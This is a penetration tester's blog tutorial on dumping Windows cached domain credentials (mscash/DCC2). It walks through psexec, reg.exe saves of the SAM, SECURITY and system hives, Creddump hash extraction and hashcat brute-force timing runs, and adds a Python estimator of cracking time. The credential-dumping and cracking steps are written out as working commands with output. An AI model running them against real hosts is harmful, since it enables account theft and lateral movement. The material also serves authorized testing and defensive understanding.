Windows Password Cache (mscache / mscash) v2

 

I wrote an article years ago on the Windows Password Cache, and that page still pops up in Google search results, so people are clearly still looking for information on it. It is also known as mscash or mscache; the real name is Domain Cached Credentials (DCC). My previous article referenced PWDumpX v1.4, and I would like to move people away from using that tool during an assessment or penetration test. When I get Domain Administrator I may run PWDumpX just to identify, for reporting purposes, the systems that do not have antivirus installed or functioning properly. You know, because PWDumpX will actually return results on those. But that is the extent of my use of PWDumpX. When it trips the enterprise antivirus and they call me up saying they spotted me, I tell them nicely that I’ve been Domain Admin all week and, by the way, your file server has no antivirus.

Also years ago I wrote an article on the Windows ntbackup utility. You back up the system state, which creates a backup of the Windows registry and places the files in C:\Windows\repair. You copy the SAM, SECURITY, and system files to your own machine and use the Creddump Python scripts to produce the same results as PWDumpX (except for the PWHistory file).

What I’m writing up is nothing new and is covered in numerous places, specifically the sites listed at the end of this document. However, I’m putting this out there because it can be tough to get Google to find exactly what you are asking for when it comes to Windows 7/8 and Server 2008/2012. This tutorial uses zero “hacker” tools on the target host. As with previous tutorials, you will need local administrative privileges on the host. This tutorial is for pivoting within an environment by obtaining Domain credentials, hopefully Domain Admin.

There are plenty of tools and techniques that do not even require you to crack a password hash, but they will not be discussed here. When conducting a penetration test there is nothing better than showing the C-level their password and what data you were able to exfiltrate using his or her credentials. Especially if the password hasn’t changed in ten years and it is the word “mike”. You know, a nickname for his first name.

Enough chit chat…Let’s do this!

Windows 2003 Server

Log into the server with psexec and the local Administrator account. Obtaining the local Administrator account credentials is outside the scope of this tutorial. Use the reg.exe command to save the SAM, SECURITY, and system hives.

C:\tools\PSTools>psexec \\192.168.1.103 -u administrator -p password cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>reg.exe save HKLM\SAM ../repair/SAM.192.168.1.103
The operation completed successfully.

C:\WINDOWS\system32>reg.exe save HKLM\SECURITY ../repair/SECURITY.192.168.1.103
The operation completed successfully.

C:\WINDOWS\system32>reg.exe save HKLM\system ../repair/system.192.168.1.103
The operation completed successfully.

Copy the files from the remote host to your local machine with Python installed.

Z:\>copy \\192.168.1.103\c$\Windows\repair\SAM.192.168.1.103 z:\SAM.192.168.1.103
1 file(s) copied.

Z:\>copy \\192.168.1.103\c$\Windows\repair\SECURITY.192.168.1.103 z:\SECURITY.192.168.1.103
1 file(s) copied.

Z:\>copy \\192.168.1.103\c$\Windows\repair\system.192.168.1.103 z:\system.192.168.1.103
1 file(s) copied.

Now that we have the registry hive files, we will use Creddump to extract the local user hashes and the cached Domain user hashes. By default Windows 2003 Server saves the last 10 Domain users that interactively authenticated to the host. This can be through the console, Remote Desktop Protocol (RDP), or the RunAs command. Hashes will not be cached if you authenticate to the host through SMB.

root@xVidia:~/tools/creddump-0.3# python pwdump.py ~/cacheTest/Win2003/system.192.168.1.103 ~/cacheTest/Win2003/SAM.192.168.1.103
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbcef4ffcfe931235927d4134505691b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
edge:1001:aad3b435b51404eeaad3b435b51404ee:85055a227564439e1f1b75db8a01e135:::
james:1003:aad3b435b51404eeaad3b435b51404ee:e547aa58e70cf7e18baf88ee52601296:::

This tutorial will demonstrate using oclHashcat to crack the mscash v1 hash (Windows 2000/XP/2003).

root@xVidia:~/tools/oclHashcat-1.01# ./cudaHashcat64.bin -a 3 -m 1100 mscash1.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1
cudaHashcat v1.01 starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU
Device #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702
Device #1: Kernel ./kernels/4318/m1100_a3.sm_30.64.ptx
Device #1: Kernel ./kernels/4318/markov_le_v1.64.ptx
Device #1: Kernel ./kernels/4318/bzero.64.ptx

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: cudaHashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]
Hash.Target....: f36bc05594a9a108083d7bcd44e731e3:mscache_test1
Hash.Type......: DCC, mscash
Time.Started...: Wed Jan 22 13:47:37 2014 (8 secs)
Time.Estimated.: Tue Jan 28 08:59:42 2014 (5 days, 19 hours)
Speed.GPU.#1...: 448.5 MH/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 3694657536/218340105584896 (0.00%)
Rejected.......: 0/3694657536 (0.00%)
HWMon.GPU.#1...: -1% Util, 35c Temp, 40% Fan

[s]tatus [p]ause [r]esume [b]ypass [q]uit =>

My graphics card, an Nvidia GeForce GTX 650 Ti, can brute force one hash at 448 million guesses a second. An eight (8) character password of upper, lower, and digits can be cracked in under 6 days. That is every combination. I point this out because we will now see how long it takes with mscash v2.

Windows 2008 Server

C:\tools\PSTools>psexec \\192.168.1.88 -u Administrator -p password cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
win-arn6ersoj2m\administrator

C:\Windows\system32>reg.exe save HKLM\SAM SAM.192.168.1.88
The operation completed successfully.

C:\Windows\system32>reg.exe save HKLM\SECURITY SECURITY.192.168.1.88
The operation completed successfully.

C:\Windows\system32>reg.exe save HKLM\system system.192.168.1.88
The operation completed successfully.

Again, copy them over to your local host and use Creddump to obtain the hashes. However, this time you have to use a patched version of Creddump that supports Windows Vista/7/2008.

I’ve seen the updated code posted in forum posts but I’ve decided to host it on this site.

http://www.jedge.com/utilities/windows7.creddump.tar.gz

Z:\>copy \\192.168.1.88\c$\Windows\System32\SAM.192.168.1.88 z:\SAM.192.168.1.88
1 file(s) copied.

Z:\>copy \\192.168.1.88\c$\Windows\System32\SECURITY.192.168.1.88 z:\SECURITY.192.168.1.88
1 file(s) copied.

Z:\>copy \\192.168.1.88\c$\Windows\System32\system.192.168.1.88 z:\system.192.168.1.88
1 file(s) copied.

root@xVidia:~# wget http://www.jedge.com/utilities/windows7.creddump.tar.gz
--2014-01-22 13:30:16-- http://www.jedge.com/utilities/windows7.creddump.tar.gz
Resolving www.jedge.com (www.jedge.com)... 74.220.207.132
Connecting to www.jedge.com (www.jedge.com)|74.220.207.132|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39562 (39K) [application/x-gzip]
Saving to: ‘windows7.creddump.tar.gz’

100%[=======================================>] 39,562 224KB/s in 0.2s

2014-01-22 13:30:17 (224 KB/s) - ‘windows7.creddump.tar.gz’ saved [39562/39562]

root@xVidia:~# tar zxf windows7.creddump.tar.gz
root@xVidia:~# cd creddump/
root@xVidia:~/creddump# python cachedump.py
usage: cachedump.py <system hive> <security hive> <vista>
root@xVidia:~/creddump# python cachedump.py ~/cacheTest/Win2008/system ~/cacheTest/Win2008/SECURITY vista

strongpassword:62c0a5bb83721869f0104a51f34ceb03:jedge:jedge.lcl
weakpassword:517e61714cbdcfd396f4b3b2b077c921:jedge:jedge.lcl
mscache_test2:c9736046ca3f3318e7847fb4dae91aa8:jedge:jedge.lcl
jedge:2838f8db1d1eb37651d9d695a3e41c42:jedge:jedge.lcl

Now here is the part that sucks. Microsoft wised up with mscash v2. The hash is computed like the previous version but with an extra step added to make it computationally intensive, to hinder brute force attacks. From http://openwall.info/wiki/john/MSCash2:

Apply PBKDF2 with SHA1 as HMAC, an iteration count of 10240, the old DCC hash as password and the Unicode username as salt in order to generate the DCC2 (MSCash2) hash. Only the first 128 bits of the resulting 160 bits are used.

Well how much of a computational hindrance is this new step? See below…

root@xVidia:~/tools/oclHashcat-1.01# ./cudaHashcat64.bin -a 3 -m 2100 mscash2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1
cudaHashcat v1.01 starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU
Device #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702
Device #1: Kernel ./kernels/4318/m2100.sm_30.64.ptx
Device #1: Kernel ./kernels/4318/markov_le_v1.64.ptx
Device #1: Kernel ./kernels/4318/bzero.64.ptx

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: cudaHashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]
Hash.Target....: c9736046ca3f3318e7847fb4dae91aa8:mscache_test2
Hash.Type......: DCC2, mscash2
Time.Started...: Wed Jan 22 13:50:34 2014 (12 secs)
Time.Estimated.: > 10 Years
Speed.GPU.#1...: 10872 H/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 131072/218340105584896 (0.00%)
Rejected.......: 0/131072 (0.00%)
HWMon.GPU.#1...: -1% Util, 35c Temp, 40% Fan

For mscash v1 you can do 448 million guesses a second while mscash v2 can only do 10,800 a second on the same hardware. An eight (8) character password of upper, lower, and digits takes less than six (6) days for mscash v1 and over ten (10) years for mscash v2.
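To put the three status blocks side by side, here is an added Python example (not from the page and not part of hashcat) that reads the Speed and Progress lines of a cudaHashcat status block, computes the keyspace of the ?u?l?d mask the same way the Progress denominator does, and turns the two into an estimated time to exhaust the mask. The three status excerpts are constructed from the figures in the runs above; the built-in charset sizes follow hashcat's definitions of ?l, ?u, ?d, ?s and ?a, and the function names are my own.

```python
import re

# Constructed status excerpts using the figures from the three cudaHashcat runs above.
STATUS_SAMPLES = {
    "mscash v1 (-m 1100)": "Speed.GPU.#1...: 448.5 MH/s\nProgress.......: 3694657536/218340105584896 (0.00%)",
    "mscash v2 (-m 2100)": "Speed.GPU.#1...: 10872 H/s\nProgress.......: 131072/218340105584896 (0.00%)",
    "NT hash (-m 1000)": "Speed.GPU.#1...: 1604.3 MH/s\nProgress.......: 8464105472/218340105584896 (0.00%)",
}

BUILTIN_CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}  # hashcat's ?l ?u ?d ?s ?a
UNIT_MULTIPLIER = {"H/s": 1.0, "kH/s": 1e3, "MH/s": 1e6, "GH/s": 1e9}


def charset_size(spec, custom):
    """Size of a charset spec such as '?u?l?d' or '?1'; custom maps '1' -> '?u?l?d'
    (the -1 option in the commands above). Built-in sets are disjoint, so sizes add."""
    size = 0
    for tok in re.findall(r"\?(.)", spec):
        size += charset_size(custom[tok], custom) if tok in custom else BUILTIN_CHARSETS[tok]
    return size


def mask_keyspace(mask, custom=None):
    """Number of candidates a mask attack (-a 3) must try for the given mask."""
    custom = custom or {}
    total = 1
    for tok in re.findall(r"\?(.)", mask):
        total *= charset_size("?" + tok, custom)
    return total


def parse_status(text):
    """Pull guesses per second and progress counters out of a status block."""
    speed = re.search(r"Speed\.GPU\.#\d+\.*:\s*([\d.]+)\s*(H/s|kH/s|MH/s|GH/s)", text)
    prog = re.search(r"Progress\.*:\s*(\d+)/(\d+)", text)
    if not speed or not prog:
        raise ValueError("Speed.GPU / Progress lines not found")
    return {
        "hps": float(speed.group(1)) * UNIT_MULTIPLIER[speed.group(2)],
        "done": int(prog.group(1)),
        "total": int(prog.group(2)),
    }


def remaining_days(status):
    """Days needed to finish the remaining keyspace at the reported speed."""
    return (status["total"] - status["done"]) / status["hps"] / 86400


def estimate_all(samples=STATUS_SAMPLES):
    return {name: remaining_days(parse_status(text)) for name, text in samples.items()}


if __name__ == "__main__":
    print("?1?1?1?1?1?1?1?1 with -1 ?u?l?d =", mask_keyspace("?1?1?1?1?1?1?1?1", {"1": "?u?l?d"}))
    for name, days in estimate_all().items():
        print(f"{name:22s} {days:12.1f} days ({days / 365.25:.1f} years)")
```

The denominator hashcat prints, 218340105584896, is exactly 62^8, which the mask_keyspace call reproduces; dividing it by the reported speed is all the Time.Estimated line is doing, which is why the 10240 PBKDF2 iterations in DCC2 move the estimate from days to centuries on the same card. The one-minute speed figure hashcat reports early in a run fluctuates, so the pure division lands a little under the 5 days 19 hours hashcat itself predicted for mscash v1.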

So what about the local hashes? They are stored using NTLMv2 and nothing has changed in Windows 7/2008. That is a problem because while the LanManager (LM) hash is in the rear-view mirror back in Windows XP/2003 land, which we know no longer exists in any environment, the NTLMv2 hash is still a piece of crap (technical term).

root@xVidia:~/tools/oclHashcat-1.01# ./cudaHashcat64.bin -a 3 -m 1000 ntlmv2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1
cudaHashcat v1.01 starting...

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU
Device #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702
Device #1: Kernel ./kernels/4318/m1000_a3.sm_30.64.ptx
Device #1: Kernel ./kernels/4318/markov_le_v1.64.ptx
Device #1: Kernel ./kernels/4318/bzero.64.ptx

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: cudaHashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]
Hash.Target....: bbcef4ffcfe931235927d4134505691b
Hash.Type......: NTLM
Time.Started...: Wed Jan 22 14:12:01 2014 (5 secs)
Time.Estimated.: Fri Jan 24 05:47:11 2014 (1 day, 15 hours)
Speed.GPU.#1...: 1604.3 MH/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 8464105472/218340105584896 (0.00%)
Rejected.......: 0/8464105472 (0.00%)
HWMon.GPU.#1...: -1% Util, 31c Temp, 40% Fan

1.6 billion, with a B, guesses a second. You know password reuse never happens in any environment. Just like Windows XP/2003 is extinct. If you happen to compromise a target via a vulnerability, say Apache Tomcat installed on a Windows 2008 server with default credentials, which runs as SYSTEM by default, then obtaining the local Administrator NTLMv2 password hash would be quite useful, and cracking it is very possible with a cheap graphics card.

Or you could send it to cloudcracker.com and for a couple of bucks run trillions, yes, with a freakin “T”, of password guesses against the hash in an hour.

Helpful links, because I didn’t come up with any of this myself:

http://openwall.info/wiki/john/MSCash

http://openwall.info/wiki/john/MSCash2

http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html

http://computer-forensics.sans.org/blog/2012/02/21/protecting-privileged-domain-account-safeguarding-password-hashes

http://technet.microsoft.com/en-us/library/cc732643.aspx

https://code.google.com/p/creddump/

http://support.microsoft.com/kb/913485

 

One Response to “Windows Password Cache (mscache / mscash) v2”

1. […] of SHA256, not to mention Microsoft’s own Windows Vista, which internally applies 10240 iterations of HMAC-SHA1 on cached domain passwords. It might sound like comparing apples and oranges, […]
